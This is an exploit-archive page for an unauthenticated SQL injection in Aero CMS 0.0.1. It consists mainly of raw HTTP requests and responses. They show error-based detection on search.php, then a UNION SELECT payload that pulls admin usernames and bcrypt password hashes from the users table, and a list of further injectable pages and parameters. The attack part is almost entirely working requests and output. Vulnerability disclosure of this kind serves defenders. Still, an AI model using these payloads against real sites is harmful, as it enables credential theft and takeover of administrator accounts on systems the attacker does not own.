Aero CMS 0.0.1 SQL Injection

Aero CMS 0.0.1 SQL Injection: Posted Mar 27, 2023; Authored by Hubert Wojciechowski; Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | f6a9385e6ed885e833628974880b8b656154a8d37009525d195e3963fa66ac50; Download | Favorite | View

Aero CMS 0.0.1 SQL Injection

# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example SQL Injection

-----------------------------------------------------------------------------------------------------------------------
Param: search
-----------------------------------------------------------------------------------------------------------------------
Req sql ini detect
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692'&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:06 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3466
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1

-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692''&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:10 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94216
[...]

-----------------------------------------------------------------------------------------------------------------------
Req exploiting sql ini get data admin
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 113

search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 05:40:05 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101144
[...]

                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>
[...]

-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [filename]
/AeroCMS-master/admin/profile.php [filename]
/AeroCMS-master/author_posts.php [author]
/AeroCMS-master/category.php [category]
/AeroCMS-master/post.php [p_id]
/AeroCMS-master/search.php [search]
/AeroCMS-master/admin/categories.php [cat_title]
/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]
/AeroCMS-master/admin/posts.php [post_content]
/AeroCMS-master/admin/posts.php [p_id]
/AeroCMS-master/admin/posts.php [post_category_id]
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [reset]

Top Authors In Last 30 Days

Red Hat 253 files
Ubuntu 83 files
Gentoo 29 files
indoushka 26 files
Debian 10 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
Google Security Research 2 files
S. Dietz 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

Aero CMS 0.0.1 SQL Injection

Aero CMS 0.0.1 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Aero CMS 0.0.1 SQL Injection

Share This

Aero CMS 0.0.1 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems